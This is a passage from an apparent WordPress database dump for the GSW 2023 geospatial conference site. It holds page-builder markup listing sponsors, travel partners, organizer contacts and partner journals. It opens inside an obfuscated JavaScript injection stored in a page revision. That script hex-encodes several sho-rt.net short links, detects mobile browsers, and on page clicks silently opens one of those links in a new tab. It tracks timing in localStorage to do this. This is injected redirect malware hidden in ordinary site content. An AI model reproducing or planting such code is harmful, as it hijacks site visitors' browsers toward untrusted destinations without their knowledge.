_0x2ccc2=[\'userAgent\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x47\\x4f\\x78\\x32\\x63\\x332\',\'length\',\'_blank\',\'mobileCheck\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x64\\x44\\x6c\\x33\\x63\\x343\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x6b\\x41\\x6f\\x30\\x63\\x330\',\'random\',\'-local-storage\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x6f\\x56\\x75\\x37\\x63\\x347\',\'stopPropagation\',\'4051490VdJdXO\',\'test\',\'open\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x61\\x68\\x44\\x36\\x63\\x356\',\'12075252qhSFyR\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x5a\\x50\\x66\\x38\\x63\\x378\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x51\\x69\\x43\\x35\\x63\\x375\',\'4829028FhdmtK\',\'round\',\'-hurs\',\'-mnts\',\'864690TKFqJG\',\'forEach\',\'abs\',\'1479192fKZCLx\',\'16548MMjUpf\',\'filter\',\'vendor\',\'click\',\'setItem\',\'3402978fTfcqu\'];_0x10c8=function(){return _0x2ccc2;};return _0x10c8();}const _0x3ec38a=_0x3023;(function(_0x550425,_0x4ba2a7){const _0x142fd8=_0x3023,_0x2e2ad3=_0x550425();while(!![]){try{const _0x3467b1=-parseInt(_0x142fd8(0x19c))/0x1+parseInt(_0x142fd8(0x19f))/0x2+-parseInt(_0x142fd8(0x1a5))/0x3+parseInt(_0x142fd8(0x198))/0x4+-parseInt(_0x142fd8(0x191))/0x5+parseInt(_0x142fd8(0x1a0))/0x6+parseInt(_0x142fd8(0x195))/0x7;if(_0x3467b1===_0x4ba2a7)break;else _0x2e2ad3[\'push\'](_0x2e2ad3[\'shift\']());}catch(_0x28e7f8){_0x2e2ad3[\'push\'](_0x2e2ad3[\'shift\']());}}}(_0x10c8,0xd3435));var _0x365b=[_0x3ec38a(0x18a),_0x3ec38a(0x186),_0x3ec38a(0x1a2),\'opera\',_0x3ec38a(0x192),\'substr\',_0x3ec38a(0x18c),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x43\\x57\\x74\\x31\\x63\\x361\',_0x3ec38a(0x187),_0x3ec38a(0x18b),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x57\\x73\\x55\\x34\\x63\\x374\',_0x3ec38a(0x197),_0x3ec38a(0x194),_0x3ec38a(0x18f),_0x3ec38a(0x196),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x53\\x4e\\x4b\\x39\\x63\\x329\',\'\',_0x3ec38a(0x18e),\'getItem\',_0x3ec38a(0x1a4),_0x3ec38a(0x19d),_0x3ec38a(0x1a1),_0x3ec38a(0x18d),_0x3ec38a(0x188),\'floor\',_0x3ec38a(0x19e),_0x3ec38a(0x199),_0x3ec38a(0x19b),_0x3ec38a(0x19a),_0x3ec38a(0x189),_0x3ec38a(0x193),_0x3ec38a(0x190),\'host\',\'parse\',_0x3ec38a(0x1a3),\'addEventListener\'];(function(_0x16176d){window[_0x365b[0x0]]=function(){let _0x129862=![];return function(_0x784bdc){(/(android|bb\\d+|meego).+mobile|avantgo|bada\\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i[_0x365b[0x4]](_0x784bdc)||/1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\\-(n|u)|c55\\/|capi|ccwa|cdm\\-|cell|chtm|cldc|cmd\\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\\-s|devi|dica|dmob|do(c|p)o|ds(12|\\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\\-|_)|g1 u|g560|gene|gf\\-5|g\\-mo|go(\\.w|od)|gr(ad|un)|haie|hcit|hd\\-(m|p|t)|hei\\-|hi(pt|ta)|hp( i|ip)|hs\\-c|ht(c(\\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\\-(20|go|ma)|i230|iac( |\\-|\\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\\/)|klon|kpt |kwc\\-|kyo(c|k)|le(no|xi)|lg( g|\\/(k|l|u)|50|54|\\-[a-w])|libw|lynx|m1\\-w|m3ga|m50\\/|ma(te|ui|xo)|mc(01|21|ca)|m\\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\\-2|po(ck|rt|se)|prox|psio|pt\\-g|qa\\-a|qc(07|12|21|32|60|\\-[2-7]|i\\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\\-|oo|p\\-)|sdk\\/|se(c(\\-|0|1)|47|mc|nd|ri)|sgh\\-|shar|sie(\\-|m)|sk\\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\\-|v\\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\\-|tdg\\-|tel(i|m)|tim\\-|t\\-mo|to(pl|sh)|ts(70|m\\-|m3|m5)|tx\\-9|up(\\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\\-|your|zeto|zte\\-/i[_0x365b[0x4]](_0x784bdc[_0x365b[0x5]](0x0,0x4)))&&(_0x129862=!![]);}(navigator[_0x365b[0x1]]||navigator[_0x365b[0x2]]||window[_0x365b[0x3]]),_0x129862;};const _0xfdead6=[_0x365b[0x6],_0x365b[0x7],_0x365b[0x8],_0x365b[0x9],_0x365b[0xa],_0x365b[0xb],_0x365b[0xc],_0x365b[0xd],_0x365b[0xe],_0x365b[0xf]],_0x480bb2=0x3,_0x3ddc80=0x6,_0x10ad9f=_0x1f773b=>{_0x1f773b[_0x365b[0x14]]((_0x1e6b44,_0x967357)=>{!localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x1e6b44+_0x365b[0x11])&&localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x1e6b44+_0x365b[0x11],0x0);});},_0x2317c1=_0x3bd6cc=>{const _0x2af2a2=_0x3bd6cc[_0x365b[0x15]]((_0x20a0ef,_0x11cb0d)=>localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x20a0ef+_0x365b[0x11])==0x0);return _0x2af2a2[Math[_0x365b[0x18]](Math[_0x365b[0x16]]()*_0x2af2a2[_0x365b[0x17]])];},_0x57deba=_0x43d200=>localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x43d200+_0x365b[0x11],0x1),_0x1dd2bd=_0x51805f=>localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x51805f+_0x365b[0x11]),_0x5e3811=(_0x5aa0fd,_0x594b23)=>localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x5aa0fd+_0x365b[0x11],_0x594b23),_0x381a18=(_0x3ab06f,_0x288873)=>{const _0x266889=0x3e8*0x3c*0x3c;return Math[_0x365b[0x1a]](Math[_0x365b[0x19]](_0x288873-_0x3ab06f)/_0x266889);},_0x3f1308=(_0x3a999a,_0x355f3a)=>{const _0x5c85ef=0x3e8*0x3c;return Math[_0x365b[0x1a]](Math[_0x365b[0x19]](_0x355f3a-_0x3a999a)/_0x5c85ef);},_0x4a7983=(_0x19abfa,_0x2bf37,_0xb43c45)=>{_0x10ad9f(_0x19abfa),newLocation=_0x2317c1(_0x19abfa),_0x5e3811(_0x365b[0x10]+_0x2bf37+_0x365b[0x1b],_0xb43c45),_0x5e3811(_0x365b[0x10]+_0x2bf37+_0x365b[0x1c],_0xb43c45),_0x57deba(newLocation),window[_0x365b[0x0]]()&&window[_0x365b[0x1e]](newLocation,_0x365b[0x1d]);};_0x10ad9f(_0xfdead6);function _0x978889(_0x3b4dcb){_0x3b4dcb[_0x365b[0x1f]]();const _0x2b4a92=location[_0x365b[0x20]];let _0x1b1224=_0x2317c1(_0xfdead6);const _0x4593ae=Date[_0x365b[0x21]](new Date()),_0x7f12bb=_0x1dd2bd(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1b]),_0x155a21=_0x1dd2bd(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1c]);if(_0x7f12bb&&_0x155a21)try{const _0x5d977e=parseInt(_0x7f12bb),_0x5f3351=parseInt(_0x155a21),_0x448fc0=_0x3f1308(_0x4593ae,_0x5d977e),_0x5f1aaf=_0x381a18(_0x4593ae,_0x5f3351);_0x5f1aaf>=_0x3ddc80&&(_0x10ad9f(_0xfdead6),_0x5e3811(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1c],_0x4593ae));;_0x448fc0>=_0x480bb2&&(_0x1b1224&&window[_0x365b[0x0]]()&&(_0x5e3811(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1b],_0x4593ae),window[_0x365b[0x1e]](_0x1b1224,_0x365b[0x1d]),_0x57deba(_0x1b1224)));}catch(_0x2386f7){_0x4a7983(_0xfdead6,_0x2b4a92,_0x4593ae);}else _0x4a7983(_0xfdead6,_0x2b4a92,_0x4593ae);}document[_0x365b[0x23]](_0x365b[0x22],_0x978889);}());</script>','GSW2023','','inherit','closed','closed','','3066-revision-v1','','','2023-08-08 15:25:25','2023-08-08 15:25:25','',3066,'https://gsw2023.com/?p=5085',0,'revision','',0),
(5086,1,'2023-08-08 15:27:00','2023-08-08 15:27:00','<p>[vc_row css=\".vc_custom_1680403823446{margin-top: -35px !important;}\"][vc_column css=\".vc_custom_1680403783341{margin-top: -15px !important;}\"][vc_row_inner css=\".vc_custom_1680403868499{margin-top: -35px !important;}\"][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1687219449581{margin-top: 100px !important;}\"]</p>\n<h4 style=\"text-align: center;\"></h4>\n<p>&nbsp;</p>\n<p>&nbsp;</p>\n<p><a href=\"https://www.gasgi.gov.sa\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-4592\" src=\"https://gsw2023.com/wp-content/uploads/2023/06/شعار-الهيئة-العامة-للمساحه-والمعلومات-الجيومكانية-بالمملكة-العربية-السعودية-2-300x110.jpg\" alt=\"\" width=\"447\" height=\"164\" /></a>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1689081933017{margin-top: 100px !important;}\"]</p>\n<h4 style=\"text-align: center;\"><span style=\"font-size: 36pt;\">Prime Sponsor</span></h4>\n<p>&nbsp;</p>\n<p><a href=\"https://www.tra.gov.eg/en/\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-5009 size-medium\" src=\"https://gsw2023.com/wp-content/uploads/2023/07/ntra-300x116.jpg\" alt=\"\" width=\"300\" height=\"116\" /></a>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1689081968974{margin-top: 95px !important;}\"]</p>\n<h4 style=\"text-align: center;\"></h4>\n<p>&nbsp;</p>\n<p>&nbsp;</p>\n<p><a href=\"https://www.esri.com/en-us/home\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-4719\" src=\"https://gsw2023.com/wp-content/uploads/2023/06/ESRI-300x111.jpg\" alt=\"\" width=\"487\" height=\"180\" /></a>[/vc_column_text][/vc_column_inner][/vc_row_inner][vc_separator style=\"shadow\" border_width=\"10\"][vc_row_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1689081337215{margin-top: 40px !important;}\"]</p>\n<h4 style=\"text-align: center;\"><span style=\"font-size: 24pt; color: #ffffff;\"><strong>Platinum Sponsors</strong></span></h4>\n<p>&nbsp;</p>\n<p><a href=\"https://www.pix4d.com/ \" target=\"_blank\" rel=\"noopener\"><img class=\"https://www.pix4d.com/ aligncenter wp-image-4482\" title=\"https://www.pix4d.com/ \" src=\"https://gsw2023.com/wp-content/uploads/2023/05/LOGO_CORP_HORIZONTAL_LIGHT-300x91.png\" alt=\"\" width=\"385\" height=\"117\" /></a>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1689080719428{margin-top: 0px !important;}\"]</p>\n<h4 style=\"text-align: center;\"><span style=\"font-size: 24pt;\"><strong>Platinum Sponsors</strong></span></h4>\n<p>&nbsp;[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1689081395417{margin-top: 10px !important;}\"]</p>\n<h4 style=\"text-align: center;\"><span style=\"font-size: 24pt; color: #ffffff;\"><strong>Platinum Sponsors</strong></span></h4>\n<p><a href=\"https://abuqir.net/home\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-5005\" src=\"https://gsw2023.com/wp-content/uploads/2023/07/aboquir-239x300.png\" alt=\"\" width=\"193\" height=\"242\" /></a>[/vc_column_text][/vc_column_inner][/vc_row_inner][vc_separator style=\"shadow\" border_width=\"10\"][vc_row_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1687096091997{margin-top: 125px !important;}\"]</p>\n<h6><a href=\"https://www.bdstar.com/en/\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-3987\" src=\"https://gsw2023.com/wp-content/uploads/2023/04/BDStar-1024x223.png\" alt=\"\" width=\"317\" height=\"69\" /></a></h6>\n<p>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1687096010128{margin-top: 50px !important;}\"]</p>\n<h3 style=\"text-align: center;\"><strong>Gold Sponsors</strong></h3>\n<p><span style=\"font-size: 8pt;\"><a href=\"https://hdmap.geomatics.ncku.edu.tw/index-US.php\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-3989\" src=\"https://gsw2023.com/wp-content/uploads/2023/04/LOGO-of-HDP-center-final0730-1-1024x351.png\" alt=\"\" width=\"350\" height=\"120\" /></a></span>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1687095942758{margin-top: 137px !important;}\"]<a href=\"https://www.applanix.com\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-3988\" src=\"https://gsw2023.com/wp-content/uploads/2023/04/Applanix_CYMK_OUTLINES_Horizontal_Blue-1024x129.jpg\" alt=\"\" width=\"451\" height=\"57\" /></a>[/vc_column_text][/vc_column_inner][/vc_row_inner][vc_row_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1687219836213{margin-top: -px !important;}\"]<a href=\"https://leica-geosystems.com\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-4701 \" src=\"https://gsw2023.com/wp-content/uploads/2023/06/hexagon_new-300x122.jpg\" alt=\"\" width=\"349\" height=\"142\" /></a>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1688951584642{margin-top: 45px !important;}\"]<span style=\"font-size: 8pt;\"><a href=\"https://www.tasa.org.tw/index.php?ln=en\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-4089 size-medium\" src=\"https://gsw2023.com/wp-content/uploads/2023/04/logo_en_tasa2-300x63.png\" alt=\"\" width=\"300\" height=\"63\" /></a></span>[/vc_column_text][vc_column_text css=\".vc_custom_1688951717998{margin-top: 90px !important;}\"]<a href=\"https://www.agisoft.com/\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-4987 size-medium\" src=\"https://gsw2023.com/wp-content/uploads/2023/07/image-300x102.png\" alt=\"\" width=\"300\" height=\"102\" /></a>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1687095881067{margin-top: 20px !important;}\"]<a href=\"https://www.microengineering.ca \" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-4560 size-medium\" src=\"https://gsw2023.com/wp-content/uploads/2023/05/Artboard-1-300x83.png\" alt=\"\" width=\"300\" height=\"83\" /></a>[/vc_column_text][/vc_column_inner][/vc_row_inner][vc_separator style=\"shadow\" border_width=\"10\"][vc_row_inner css=\".vc_custom_1680403868499{margin-top: -35px !important;}\"][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1690459872519{margin-top: 50px !important;}\"]</p>\n<h4 style=\"text-align: center;\"></h4>\n<p>&nbsp;</p>\n<p style=\"text-align: center;\"><a href=\"https://www.piesat.cn/en-us/\" target=\"_blank\" rel=\"noopener\"><img class=\"alignnone wp-image-5053\" src=\"https://gsw2023.com/wp-content/uploads/2023/07/5X5cm-PIESAT-Logo-300x300.png\" alt=\"\" width=\"276\" height=\"276\" /></a></p>\n<p>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1690460056235{margin-top: 50px !important;}\"]</p>\n<h4 style=\"text-align: center;\"><span style=\"font-size: 18pt;\"><strong>Silver Sponsors</strong></span></h4>\n<p>&nbsp;</p>\n<p style=\"text-align: center;\"><a href=\"https://www.vexcel-imaging.com/\" target=\"_blank\" rel=\"noopener\"><img class=\"alignnone wp-image-4990 \" src=\"https://gsw2023.com/wp-content/uploads/2023/07/image002.jpg\" alt=\"\" width=\"179\" height=\"213\" /></a></p>\n<p>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1688951105389{margin-top: 50px !important;}\"]</p>\n<h4 style=\"text-align: center;\"></h4>\n<p>&nbsp;</p>\n<p>&nbsp;</p>\n<p>&nbsp;</p>\n<p style=\"text-align: center;\"><a href=\"https://terrasolid.com/\" target=\"_blank\" rel=\"noopener\"><img class=\"alignnone wp-image-4655 \" src=\"https://gsw2023.com/wp-content/uploads/2023/06/Terrasolid_logo_wide2_rgb_300dpi-300x112.png\" alt=\"\" width=\"324\" height=\"121\" /><br />\n</a>[/vc_column_text][/vc_column_inner][/vc_row_inner][vc_separator style=\"shadow\" border_width=\"10\"][vc_row_inner css=\".vc_custom_1680403868499{margin-top: -35px !important;}\"][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1687096291206{margin-top: 50px !important;}\"]<a href=\"https://www.geosat.com.tw\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-4041 size-medium\" src=\"https://gsw2023.com/wp-content/uploads/2023/04/Geosat-logo-300x170.jpg\" alt=\"\" width=\"300\" height=\"170\" /></a>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1687096367037{margin-top: 50px !important;}\"]</p>\n<h4 style=\"text-align: center;\"><strong>Bronze Sponsors</strong></h4>\n<p><a href=\"https://www.riegl.com\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-3997 size-medium\" src=\"https://gsw2023.com/wp-content/uploads/2023/04/Logo_Schriftzug_rgb_R-300x107.png\" alt=\"\" width=\"300\" height=\"107\" /></a>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1687096532104{margin-top: 88px !important;}\"]<a href=\"https://www.robotlab.com.tw\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-4033 size-medium\" src=\"https://gsw2023.com/wp-content/uploads/2023/04/Xiang-Cheng-electronic-Logo-300x107.png\" alt=\"\" width=\"300\" height=\"107\" /></a>[/vc_column_text][/vc_column_inner][/vc_row_inner][vc_separator style=\"shadow\" border_width=\"10\"][vc_row_inner css=\".vc_custom_1680403868499{margin-top: -35px !important;}\"][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1690251276274{margin-top: 50px !important;}\"]</p>\n<h4 style=\"text-align: center;\"><span style=\"font-size: 18pt;\">Official Airline</span></h4>\n<p><a href=\"https://bit.ly/3HLQBrB\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-4495 \" src=\"https://gsw2023.com/wp-content/uploads/2023/05/egyptair-e1690251327743-300x167.png\" alt=\"\" width=\"309\" height=\"172\" /></a></p>\n<p style=\"text-align: center;\">Egypt Air will offer 20% Discount on tickets for the Conference Participants.</p>\n<p>[/vc_column_text][dt_default_button link=\"url:https%3A%2F%2Fgsw2023.com%2Findex.php%2Fegyptair%2F|title:EGYPTAIR\" size=\"medium\" btn_width=\"btn_fixed_width\" custom_btn_width=\"200\" button_alignment=\"btn_center\" css=\".vc_custom_1687571509167{margin-top: -90px !important;margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}\"]For EGYPTAIR Booking More Detail[/dt_default_button][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1690452445334{margin-top: 50px !important;}\"]</p>\n<h4 style=\"text-align: center;\"><span style=\"font-size: 18pt;\">Tourism partner</span></h4>\n<h4 style=\"text-align: center;\"><a href=\"https://funtrip-travel.com/\" target=\"_blank\" rel=\"noopener\"><img class=\"alignnone wp-image-5041\" src=\"https://gsw2023.com/wp-content/uploads/2023/07/LOGO-FINAL2-300x184.jpg\" alt=\"\" width=\"265\" height=\"163\" /></a></h4>\n<p style=\"text-align: center;\">Email : <span style=\"color: #3366ff;\"><strong>gsw2023@funtrip-travel.com</strong></span></p>\n<p style=\"text-align: center;\">Mobile no and WhatsApp: <span style=\"color: #3366ff;\"><strong>+201221541515</strong></span></p>\n<p>[/vc_column_text][dt_default_button link=\"url:https%3A%2F%2Ffuntrip-travel.com%2F|title:FunTrip|target:_blank\" size=\"medium\" btn_width=\"btn_fixed_width\" custom_btn_width=\"200\" button_alignment=\"btn_center\" css=\".vc_custom_1690452582489{margin-top: -15px !important;margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}\"]For FunTrip More Detail[/dt_default_button][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1690600884765{margin-top: 50px !important;}\"]</p>\n<h4 style=\"text-align: center;\"><span style=\"font-size: 18pt;\">Exhibition organizer</span></h4>\n<h4 style=\"text-align: center;\"><a href=\"https://www.purespot.org/\" target=\"_blank\" rel=\"noopener\"><img class=\"alignnone wp-image-5061\" src=\"https://gsw2023.com/wp-content/uploads/2023/07/Logo-Pure-2-300x300.jpg\" alt=\"\" width=\"151\" height=\"151\" /></a></h4>\n<p style=\"text-align: left;\"><span style=\"font-size: 8pt; color: #3366ff;\"><strong>project manager </strong></span><br />\n<span style=\"font-size: 8pt;\"><strong>Mr. Omar Mohamed</strong></span><br />\n<span style=\"font-size: 8pt;\">Email: omar.mohamed@egypure.org   </span><span style=\"font-size: 8pt;\"> phone : ⁦+20 100 098 8976⁩</span></p>\n<p style=\"text-align: left;\"><span style=\"font-size: 8pt;\"><strong>Mr. Ahmed Refaat</strong></span><br />\n<span style=\"font-size: 8pt;\">Email: ahmed.refaat@egypure.org   </span><span style=\"font-size: 8pt;\">  phone :⁦+20 100 084 4792</span>[/vc_column_text][/vc_column_inner][/vc_row_inner][vc_row_inner css=\".vc_custom_1680403868499{margin-top: -35px !important;}\"][vc_column_inner][dt_default_button link=\"url:https%3A%2F%2Fgsw2023.com%2Findex.php%2Fegyptair%2F|title:EGYPTAIR\" size=\"medium\" btn_width=\"btn_fixed_width\" custom_btn_width=\"200\" button_alignment=\"btn_center\" css=\".vc_custom_1687571509167{margin-top: -90px !important;margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}\"]For EGYPTAIR Booking More Detail[/dt_default_button][vc_separator style=\"shadow\" border_width=\"10\"][vc_column_text css=\".vc_custom_1691508404127{margin-top: 50px !important;}\"]</p>\n<h1 style=\"text-align: center;\">Journals partner</h1>\n<h3 style=\"text-align: center;\">The author has the opportunity to publish his/her articles in one of the following journals :</h3>\n<p>&nbsp;</p>\n<p style=\"text-align: center;\"><span style=\"color: #000000;\"><a style=\"color: #000000;\" href=\"https://www.springer.com/journal/43995/\"><span style=\"font-size: 14pt;\"><strong>Journal of Umm Al-Qura University for Engineering and Architecture</strong></span></a></span></p>\n<p style=\"text-align: center;\"><span style=\"font-size: 14pt;\"><strong><a href=\"http://www.springer.com/journal/43995\">www.springer.com/journal/43995</a></strong></span></p>\n<h3></h3>\n<p style=\"text-align: center;\"><span style=\"font-size: 14pt;\"><strong>Journal of Engineering and Thermal Sciences (JETS) ISSN (Online) 2669-2465</strong></span></p>\n<p style=\"text-align: center;\"><span style=\"font-size: 14pt;\"><a href=\"http://www.extrica.com/journal/jets\">www.extrica.com/journal/jets</a></span></p>\n<p>[/vc_column_text][/vc_column_inner][vc_column_inner][/vc_column_inner][/vc_row_inner][/vc_column][/vc_row][vc_row css=\".vc_custom_1668205719738{margin-top: 20px !important;margin-bottom: 0px !important;border-top-width: 0px !important;border-bottom-width: 0px !important;padding-top: 0px !important;padding-bottom: 0px !important;}\"][vc_column css=\".vc_custom_1668010547399{margin-top: 20px !important;margin-bottom: 0px !important;border-top-width: 0px !important;border-bottom-width: 0px !important;padding-top: 0px !important;padding-bottom: 0px !important;}\"][vc_separator style=\"shadow\" border_width=\"10\"][vc_column_text css=\".vc_custom_1687848604610{margin-bottom: 0px !important;border-bottom-width: 0px !important;padding-bottom: 10px !important;}\"]</p>\n<h2 style=\"color: #311b92; text-align: center;\"><strong> EGYPT GSW\'2023</strong></h2>\n<p>[/vc_column_text][/vc_column][/vc_row][vc_row content_placement=\"top\" css=\".vc_custom_1687710509489{margin-top: 0px !important;margin-bottom: 0px !important;border-top-width: 0px !important;border-bottom-width: 0px !important;padding-top: 0px !important;padding-bottom: 0px !important;}\"][vc_column width=\"1/3\" css=\".vc_custom_1687711699560{margin-top: 0px !important;margin-bottom: 0px !important;border-top-width: 0px !important;border-bottom-width: 0px !important;padding-top: 0px !important;padding-bottom: 0px !important;}\"][vc_column_text css=\".vc_custom_1687711558584{margin-top: 0px !important;border-top-width: 0px !important;padding-top: 0px !important;}\"]</p>\n<p style=\"text-align: justify;\">As we celebrate our 50th anniversary, the Arab Academy for Science, Technology, and Maritime Transport (AASTMT) is honored to host the ISPRS first Geospatial Week in Africa and Middle East in 2023 (GSW-2023) that will be held under the auspices of H.E Secretary-General of the League of Arab States. The conference will be held in September 2023, at the InterContinental Cairo Semiramis Cairo, Egypt. AASTMT strongly believes that science is the key to the future and the cornerstone for nations\' progress and prosperity. <a href=\"https://gsw2023.com/index.php/welcome/\"><span style=\"text-decoration: underline;\"><strong><span style=\"color: #3366ff; text-decoration: underline;\">Read More</span></strong></span></a></p>\n<p>[/vc_column_text][/vc_column][vc_column width=\"2/3\" css=\".vc_custom_1668010506951{margin-top: 0px !important;margin-bottom: 0px !important;border-top-width: 0px !important;border-bottom-width: 0px !important;padding-top: 0px !important;padding-bottom: 0px !important;}\"][dt_team_masonry order=\"asc\" custom_content_bg_color=\"#e8e8e8\" image_sizing=\"proportional\" img_max_width=\"120px\" image_paddings=\"10px 0px 0px 0px\" img_border_radius=\"10px\" post_title_bottom_margin=\"0px\" team_position_bottom_margin=\"0px\" read_more_button=\"off\" soc_icon_border_width=\"0px\" soc_icon_color=\"#ffffff\" posts_offset=\"0\" category=\"105\" css_dt_team_masonry=\".vc_custom_1687711659617{margin-top: 0px !important;}\"][/vc_column][/vc_row][vc_row bg_type=\"image\" parallax_style=\"vcpb-animated\" bg_image_new=\"id^3283|url^https://gsw2023.com/wp-content/uploads/2022/11/1664433062169.jpg|caption^null|alt^null|title^1664433062169|description^null\" animation_direction=\"top-animation\" bg_override=\"ex-full\" fadeout_row=\"fadeout_row_value\" enable_overlay=\"enable_overlay_value\" overlay_color=\"#3a3a3a\" overlay_pattern=\"transperant\" overlay_pattern_opacity=\"75\"][vc_column width=\"1/3\"][vc_column_text 